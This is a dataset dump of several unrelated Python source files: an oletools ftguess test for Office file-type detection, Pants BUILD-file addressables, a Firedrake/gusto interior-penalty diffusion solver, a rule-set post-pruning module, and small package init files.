    """Test ftguess"""
    def test_all(self):
        """Run all files in test-data and compare to known output."""
        # ftguess knows extension for each FType, create a reverse mapping
        # from extension to expected file type.
        used_types = (
            ftguess.FType_RTF, ftguess.FType_Generic_OLE,
            ftguess.FType_Generic_Zip, ftguess.FType_Word97,
            ftguess.FType_Word2007, ftguess.FType_Word2007_Macro,
            ftguess.FType_Word2007_Template,
            ftguess.FType_Word2007_Template_Macro, ftguess.FType_Excel97,
            ftguess.FType_Excel2007,
            ftguess.FType_Excel2007_XLSX , ftguess.FType_Excel2007_XLSM ,
            ftguess.FType_Excel2007_Template,
            ftguess.FType_Excel2007_Template_Macro,
            ftguess.FType_Excel2007_Addin_Macro, ftguess.FType_Powerpoint97,
            ftguess.FType_Powerpoint2007_Presentation,
            ftguess.FType_Powerpoint2007_Slideshow,
            ftguess.FType_Powerpoint2007_Macro,
            ftguess.FType_Powerpoint2007_Slideshow_Macro,
            ftguess.FType_XPS,
        )
        ftype_for_extension = dict()
        for ftype in used_types:
            for extension in ftype.extensions:
                ftype_for_extension[extension] = ftype
        # TODO: xlsb is not implemented yet
        ftype_for_extension['xlsb'] = ftguess.FType_Generic_OpenXML
        for filename, file_contents in loop_over_files():
            # let the system guess
            guess = ftguess.ftype_guess(data=file_contents)
            #print(f'for debugging: (unknown) --> {guess}')
            # determine what we expect...
            # For x.docx.zip-style names, the real extension is the inner one.
            before_dot, extension = splitext(filename)
            if extension == '.zip':
                extension = splitext(before_dot)[1]
            elif filename in ('basic/empty', 'basic/text'):
                extension = '.csv' # have just like that
            elif not extension:
                self.fail('Could not find extension for test sample {0}'
                          .format(filename))
            extension = extension[1:] # remove the leading '.'
            # encrypted files are mostly recognized (yet?), except .xls
            if filename.startswith('encrypted/'):
                if extension == 'xls':
                    expect = ftguess.FType_Excel97
                else:
                    expect = ftguess.FType_Generic_OLE
            elif extension in ('xml', 'csv', 'odt', 'ods', 'odp', 'potx', 'potm'):
                # not really an office file type
                expect = ftguess.FType_Unknown
            elif filename == 'basic/encrypted.docx':
                expect = ftguess.FType_Generic_OLE
            else:
                # other files behave nicely, so extension determines the type
                expect = ftype_for_extension[extension]
            # Compare container, filetype and application separately so a
            # failure message points at the precise mismatch.
            self.assertEqual(guess.container, expect.container,
                             msg='ftguess guessed container {0} for {1} '
                                 'but we expected {2}'
                                 .format(guess.container, filename,
                                         expect.container))
            self.assertEqual(guess.filetype, expect.filetype,
                             msg='ftguess guessed filetype {0} for {1} '
                                 'but we expected {2}'
                                 .format(guess.filetype, filename,
                                         expect.filetype))
            self.assertEqual(guess.application, expect.application,
                             msg='ftguess guessed application {0} for {1} '
                                 'but we expected {2}'
                                 .format(guess.application, filename,
                                         expect.application))
            # The is_excel/is_word/is_powerpoint helpers are only meaningful
            # for fully-identified types.
            if expect not in (ftguess.FType_Generic_OLE, ftguess.FType_Unknown):
                self.assertEqual(guess.is_excel(), extension.startswith('x')
                                 and extension != 'xml'
                                 and extension != 'xlsb'
                                 and extension != 'xps')
                # xlsb is excel but not handled properly yet
                self.assertEqual(guess.is_word(), extension.startswith('d'))
                self.assertEqual(guess.is_powerpoint(),
                                 extension.startswith('p'))
# Allow running this module directly (``python test_basic.py``) in addition
# to discovery by a test runner.
if __name__ == '__main__':
    unittest.main()
| StarcoderdataPython |
3399473 | # coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
from abc import abstractmethod
from pants.base.build_file_target_factory import BuildFileTargetFactory
from pants.build_graph.address import BuildFileAddress
from pants.util.meta import AbstractClass
class AddressableCallProxy(BuildFileTargetFactory):
  """Stands in for an addressable alias inside a BUILD file.

  Calls are delegated to the wrapped addressable factory; any named result is
  reported back through the registration callback together with its address.
  """

  def __init__(self, addressable_factory, build_file, registration_callback):
    self._addressable_factory = addressable_factory
    self._build_file = build_file
    self._registration_callback = registration_callback

  @property
  def target_types(self):
    # Delegate to the wrapped factory.
    return self._addressable_factory.target_types

  def __call__(self, *args, **kwargs):
    addressable = self._addressable_factory.capture(*args, **kwargs)
    name = addressable.addressed_name
    if name:
      # Only named addressables get registered under a BUILD file address.
      self._registration_callback(
        BuildFileAddress(build_file=self._build_file, target_name=name),
        addressable)
    return addressable

  def __repr__(self):
    return ('AddressableCallProxy(addressable_factory={}, build_file={})'
            .format(self._addressable_factory, self._build_file))
class Addressable(AbstractClass):
  """An ABC for classes which would like instances to be named and exported from BUILD files."""

  class Factory(BuildFileTargetFactory):
    """Captures addressable instances from BUILD file calls."""

    @abstractmethod
    def capture(self, *args, **kwargs):
      """Captures the arguments passed to an addressable alias in a BUILD file.

      :returns: An addressable instance representing the call capture.
      :rtype: :class:`Addressable`
      """

    def __str__(self):
      return '{}(target_types={})'.format(type(self).__name__, self.target_types)

  class AddressableInitError(Exception):
    """Indicates a problem capturing arguments to create a new :class:`Addressable`."""

  def __init__(self, addressed_alias, addressed_type):
    """
    :param addressed_alias: The BUILD file alias this addressable was invoked via.
    :param addressed_type: The class whose construction this addressable proxies.
    """
    self._addressed_alias = addressed_alias
    self._addressed_type = addressed_type

  @property
  def addressed_alias(self):
    """The alias via which this addressable was invoked.

    :rtype: string
    """
    return self._addressed_alias

  @property
  def addressed_type(self):
    """The type this addressable captures calls to and ultimately can `instantiate`.

    :returns: The class of the addressed type this addressable proxies for.
    :rtype: type
    """
    return self._addressed_type

  @property
  def addressed_name(self):
    """This property is inspected by AddressableCallProxy to automatically name Addressables.

    Generally, a subclass will inspect its captured arguments and return, for example, the
    captured `name` parameter.  A value of `None` (the default) causes AddressableCallProxy
    to skip capturing and naming this instance.
    """
    return None

  def instantiate(self, *args, **kwargs):
    """Realizes the captured addressable call as an instance of the aliased object type.

    :returns: A fully hydrated addressable object.
    """
    return self.addressed_type(*args, **kwargs)
| StarcoderdataPython |
"""Top-level package for LensLikelihood."""

# Package metadata; the author/email values are anonymized placeholders
# left by the dataset scrubbing, not real identifiers.
__author__ = """<NAME>"""
__email__ = '<EMAIL>'
__version__ = '0.1.0'
3361889 | <filename>djenga/core/__init__.py<gh_stars>1-10
from .bunch import Bunch
from .env import * # noqa
| StarcoderdataPython |
4824805 | <filename>gusto/diffusion.py
from abc import ABCMeta, abstractmethod
from firedrake import (TestFunction, TrialFunction, Function,
inner, outer, grad, avg, dx, dS_h, dS_v,
FacetNormal, LinearVariationalProblem,
LinearVariationalSolver, action)
__all__ = ["InteriorPenalty"]
class Diffusion(object, metaclass=ABCMeta):
    """Abstract base class for gusto diffusion schemes.

    Concrete schemes must implement :meth:`apply`.

    :arg state: :class:`.State` object.
    """

    def __init__(self, state):
        # Keep a reference to the model state for use by subclasses.
        self.state = state

    @abstractmethod
    def apply(self, x, x_out):
        """Apply the diffusion operator to ``x``.

        Reads the input ``x``, computes F(x) and writes the result into
        ``x_out``.

        :arg x: :class:`.Function` object, the input Function.
        :arg x_out: :class:`.Function` object, the output Function.
        """
class InteriorPenalty(Diffusion):
    """
    Interior penalty diffusion method.

    Each call to :meth:`apply` performs one implicit step of size ``dt``
    (taken from ``state.timestepping.dt``): it solves
    ``<gamma, phi> + dt*a_ip(gamma, phi) = <gamma, phi_in>`` for ``phi``,
    where ``a_ip`` is the interior-penalty discretisation of the
    diffusion operator.

    :arg state: :class:`.State` object (supplies the mesh and the timestep).
    :arg V: function space of the diffused field.
    :arg kappa: strength (diffusivity) of the diffusion.
    :arg mu: the penalty weighting function, which is recommended to be
        proportional to 1/dx.
    :arg bcs: (optional) a list of boundary conditions to apply.
    """
    def __init__(self, state, V, kappa, mu, bcs=None):
        super(InteriorPenalty, self).__init__(state)
        dt = state.timestepping.dt
        gamma = TestFunction(V)
        phi = TrialFunction(V)
        self.phi1 = Function(V)  # holds the input on entry and the solution on exit
        n = FacetNormal(state.mesh)
        # Mass term plus the element-interior part of the diffusion operator.
        a = inner(gamma, phi)*dx + dt*inner(grad(gamma), grad(phi)*kappa)*dx

        def get_flux_form(dS, M):
            # Interior-facet contributions over measure dS with diffusivity M:
            # the two consistency/symmetry flux terms plus the mu-weighted
            # penalty term of the interior penalty method.
            fluxes = (-inner(2*avg(outer(phi, n)), avg(grad(gamma)*M))
                      - inner(avg(grad(phi)*M), 2*avg(outer(gamma, n)))
                      + mu*inner(2*avg(outer(phi, n)), 2*avg(outer(gamma, n)*kappa)))*dS

            return fluxes
        # Facet integrals over both interior-facet measures (vertical and
        # horizontal facets of an extruded Firedrake mesh).
        a += dt*get_flux_form(dS_v, kappa)
        a += dt*get_flux_form(dS_h, kappa)
        L = inner(gamma, phi)*dx
        # The right-hand side is the mass form applied to the current phi1,
        # so the solve updates phi1 in place.
        problem = LinearVariationalProblem(a, action(L, self.phi1), self.phi1, bcs=bcs)
        self.solver = LinearVariationalSolver(problem)

    def apply(self, x_in, x_out):
        """Diffuse ``x_in`` for one timestep and write the result to ``x_out``."""
        self.phi1.assign(x_in)
        self.solver.solve()
        x_out.assign(self.phi1)
| StarcoderdataPython |
3267854 | # Performs post-pruning of a rule set by deleting rules that don't improve the training accuracy
from . import simplification as s
from . import evaluation_formulas as ef
from operator import concat
import time
import math
import itertools
import heapq
def post_prune(dnf, class_condition, condition_example_dict, example_indexes, data = None):
    '''
    Applies boolean simplification and post-pruning to a rule set.

    param dnf: list of lists of condition tuples, emulating a DNF expression
    param class_condition: condition which that DNF classifies for
    param condition_example_dict: maps each condition key to the example
        indexes satisfying it (the evaluation of conditions in the network)
    param example_indexes: indexes of the training examples
    param data: optional evaluation data; when given, fidelity is printed
        after each stage
    returns: the pruned (and possibly simplified) DNF
    '''
    if len(dnf) > 1:
        dnf = delete_non_ocurring_rules(dnf, class_condition, condition_example_dict, example_indexes)
    # Sort each rule's conditions in place so later rule comparisons are
    # order-insensitive.
    for r in dnf:
        r.sort()
    # Note: this also drops rules with at least as many false positives as
    # true positives (see _build_pos_neg_tp_fp).
    dnf, positives, negatives, tp, fp = _build_pos_neg_tp_fp(dnf, class_condition, condition_example_dict, example_indexes)
    dnf = prune_rules(dnf, class_condition, condition_example_dict, example_indexes, positives, negatives, tp, fp)
    print('\nRules that do not increase accuracy are pruned')
    print('F number rules:',len(dnf))
    print('F number terms:',sum(len(r) for r in dnf))
    if data:
        print('Fidelity:', ef.accuracy_of_dnf(data, class_condition, dnf, True, False, False, True))
    if len(dnf) > 1:
        dnf = s.boolean_simplify_complex(dnf)
    print('\nBasic boolean simplification')
    print('F number rules:',len(dnf))
    print('F number terms:',sum(len(r) for r in dnf))
    if data:
        print('Fidelity:', ef.accuracy_of_dnf(data, class_condition, dnf, True, False, False, True))
    return dnf
def delete_non_ocurring_rules(dnf, class_condition, condition_example_dict, example_indexes):
    """Return only the rules of ``dnf`` fired by at least one positive example.

    A positive example is one fulfilling ``class_condition``; a rule that no
    positive example satisfies cannot contribute true positives, so it is dropped.
    (Note: the name's "ocurring" spelling is kept for caller compatibility.)
    """
    positive_examples = [
        example for example in example_indexes
        if _fulfills_condition(example, condition_example_dict, class_condition)
    ]
    kept = []
    for rule in dnf:
        if any(_fulfills_rule(example, condition_example_dict, rule)
               for example in positive_examples):
            kept.append(rule)
    return kept
def _create_merged_rule(rule_1, rule_2):
""" Finds a rule which is the least general rule that is more general than
both argument rules.
"""
neurons = set((l, n) for (l, n, t, b) in rule_1).intersection((l, n) for (l, n, t, b) in rule_1)
new_rule = []
for (l_i, n_i) in neurons:
bigger_t_1 = [t for (l, n, t, b) in rule_1 if (l, n) == (l_i, n_i) and b]
smaller_t_1 = [t for (l, n, t, b) in rule_1 if (l, n) == (l_i, n_i) and not b]
bigger_t_2 = [t for (l, n, t, b) in rule_2 if (l, n) == (l_i, n_i) and b]
smaller_t_2 = [t for (l, n, t, b) in rule_2 if (l, n) == (l_i, n_i) and not b]
if bigger_t_1 and bigger_t_2:
min_t = min(bigger_t_1 + bigger_t_2)
new_rule.append((l_i, n_i, min_t, True))
if smaller_t_1 and smaller_t_2:
max_t = max(smaller_t_1 + smaller_t_2)
new_rule.append((l_i, n_i, max_t, False))
return new_rule
def _fulfills_condition(example_index, condition_example_dict, cond):
if cond[3]:
if example_index in condition_example_dict[(cond[0], cond[1], cond[2])]:
return True
else:
return False
else:
if example_index not in condition_example_dict[(cond[0], cond[1], cond[2])]:
return True
else:
return False
def _fulfills_rule(example_index, condition_example_dict, rule):
    """Return True when the example satisfies every condition of the rule.

    A rule is a conjunction of condition tuples; an empty rule is vacuously
    fulfilled by every example.
    """
    # `all` already yields a bool; the former if/else returning literal
    # True/False was redundant.
    return all(_fulfills_condition(example_index, condition_example_dict, c)
               for c in rule)
def _build_pos_neg_tp_fp(dnf, class_condition, condition_example_dict, example_indexes, positives=None, negatives=None):
    """Split examples into positives/negatives and score every rule.

    Computes the true-positive and false-positive example lists for each rule
    of ``dnf`` and keeps only rules with strictly more true positives than
    false positives.

    Returns ``(kept_dnf, positives, negatives, tp, fp)`` with ``tp``/``fp``
    parallel to ``kept_dnf``.
    """
    # Falsy (not just None) positives/negatives are recomputed, matching the
    # original behaviour.
    if not positives:
        positives = [e for e in example_indexes
                     if _fulfills_condition(e, condition_example_dict, class_condition)]
    if not negatives:
        negatives = [e for e in example_indexes
                     if not _fulfills_condition(e, condition_example_dict, class_condition)]
    kept_rules = []
    tp = []
    fp = []
    for rule in dnf:
        rule_tp = [e for e in positives if _fulfills_rule(e, condition_example_dict, rule)]
        rule_fp = [e for e in negatives if _fulfills_rule(e, condition_example_dict, rule)]
        # Keep the rule only when it fires on more positives than negatives.
        if len(rule_fp) < len(rule_tp):
            kept_rules.append(rule)
            tp.append(rule_tp)
            fp.append(rule_fp)
    return kept_rules, positives, negatives, tp, fp
def prune_rules(dnf, class_condition, condition_example_dict, example_indexes, positives, negatives, tp, fp):
    '''
    Greedily simplifies the rule set without decreasing training accuracy.

    The rules are visited in order of increasing certainty factor
    (tp / (tp + fp)), i.e. least reliable first.  For the current rule, the
    accuracy after (a) deleting any single one of its conditions, (b) merging
    it with any other remaining rule, or (c) deleting the rule outright is
    computed.  The best variant is adopted when it strictly improves on the
    current accuracy; the modified rule is appended to the rule list and
    pushed back onto the heap of rules to explore.
    NOTE(review): the original description said the change is made when the
    improvement is "zero or more", but the code below requires a strict
    improvement (``>``) — confirm which is intended.

    :param dnf: list of rules (lists of condition tuples); mutated in place
        by appending newly created rule variants
    :param positives: example indexes fulfilling ``class_condition``
    :param negatives: example indexes not fulfilling ``class_condition``
    :param tp:/:param fp: per-rule true/false-positive lists, parallel to ``dnf``
    :returns: the surviving (possibly modified) rules
    '''
    n_rules = len(dnf)
    # Indexes (into dnf) of the rules that will be kept at the end.
    remaining_rules = list(range(n_rules)) #ADDED list(...) range is no list in Python3
    # Min-heap of (certainty_factor, rule_index): least certain rules pop first.
    rules_to_explore = []
    for r in range(n_rules):
        try:
            certainty_factor = float(len(tp[r]))/(len(tp[r]) + len(fp[r]))
        except ZeroDivisionError:
            # Rule matches no examples at all.
            certainty_factor = 0
        heapq.heappush(rules_to_explore, (certainty_factor, r))
    # Training accuracy of the full set: covered positives + uncovered negatives.
    tp_count = sum(1 for e in positives if any(e in tp[i] for i in remaining_rules))
    tn_count = sum(1 for e in negatives if not any(e in fp[i] for i in remaining_rules))
    last_accuracy = float(tp_count+tn_count)/len(example_indexes)
    print('last_accuracy', last_accuracy)
    while rules_to_explore:
        print('rules_to_explore', rules_to_explore)
        print('Size of heap:', len(rules_to_explore))
        cf, j = heapq.heappop(rules_to_explore)
        print('j', j)
        # Positive and negative examples that are classified by the rest of the rules.
        tp_others = [e for e in positives if any(e in tp[i] for i in remaining_rules if i != j)]
        fp_others = [e for e in negatives if any(e in fp[i] for i in remaining_rules if i != j)]
        # Positive and negative examples that are not classified by any of the other rules.
        left_tp = [e for e in positives if e not in tp_others]
        left_fp = [e for e in negatives if e not in fp_others]
        # Positive and negative examples that are only classified by rule j.
        # NOTE(review): tp_rule/fp_rule are computed but never used below.
        tp_rule = [e for e in tp[j] if e not in tp_others]
        fp_rule = [e for e in fp[j] if e not in fp_others]
        # Max-heap (via negated accuracy) of candidate replacements for rule j.
        rule_variants = []
        # Variant (a): drop each single condition of the rule in turn.
        for cond_i in range(len(dnf[j])):
            new_rule = dnf[j][:]
            del new_rule[cond_i]
            additional_tp = [e for e in left_tp if _fulfills_rule(e, condition_example_dict, new_rule)]
            additional_fp = [e for e in left_fp if _fulfills_rule(e, condition_example_dict, new_rule)]
            accuracy = float(len(tp_others)+len(additional_tp)+len(left_fp)-len(additional_fp))/len(example_indexes)
            new_rule.sort()
            heapq.heappush(rule_variants, (-accuracy, new_rule))
        # Variant (b): merge rule j with any other remaining rule.
        for other in remaining_rules:
            if other != j:
                new_rule = _create_merged_rule(dnf[j], dnf[other])
                new_rule.sort()
                # Skip merges that just reproduce one of the two parent rules.
                if new_rule != sorted(dnf[j]) and new_rule != sorted(dnf[other]):
                    additional_tp = [e for e in left_tp if _fulfills_rule(e, condition_example_dict, new_rule)]
                    additional_fp = [e for e in left_fp if _fulfills_rule(e, condition_example_dict, new_rule)]
                    accuracy = float(len(tp_others)+len(additional_tp)+len(left_fp)-len(additional_fp))/len(example_indexes)
                    heapq.heappush(rule_variants, (-accuracy, new_rule))
        # Variant (c): delete rule j entirely (represented by the empty rule []).
        accuracy = float(len(tp_others)+len(left_fp))/len(example_indexes)
        heapq.heappush(rule_variants, (-accuracy, []))
        # Best variant = smallest negated accuracy; `accuracy` is still negated here.
        accuracy, chosen_rule = heapq.heappop(rule_variants)
        if -accuracy > last_accuracy:
            last_accuracy = -accuracy
            print('last_accuracy', last_accuracy)
            # The original rule j is dropped in favour of the chosen variant.
            remaining_rules.remove(j)
            print('new rule', chosen_rule)
            if len(chosen_rule)>0:
                # Register the replacement: extend dnf/tp/fp in lockstep and
                # push the new rule back onto the heap so it can be revisited.
                tp_new = [e for e in positives if _fulfills_rule(e, condition_example_dict, chosen_rule)]
                fp_new = [e for e in negatives if _fulfills_rule(e, condition_example_dict, chosen_rule)]
                tp.append(tp_new)
                fp.append(fp_new)
                dnf.append(chosen_rule)
                remaining_rules.append(n_rules)
                try:
                    certainty_factor = float(len(tp_new))/(len(tp_new) + len(fp_new))
                except ZeroDivisionError:
                    certainty_factor = 0
                heapq.heappush(rules_to_explore, (certainty_factor, n_rules))
                n_rules += 1
            else:
                print('rule deleted')
    return [dnf[r] for r in remaining_rules]
| StarcoderdataPython |
3279251 | <reponame>tehw0lf/pybel<filename>src/pybel/struct/mutation/deletion/__init__.py
# -*- coding: utf-8 -*-
"""Modules supporting deletion and degradation of graphs."""
from . import protein_rna_origins, deletion
from .protein_rna_origins import *
from .deletion import *
# The package's public API is the union of its submodules' public names.
__all__ = (
    protein_rna_origins.__all__ +
    deletion.__all__
)
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.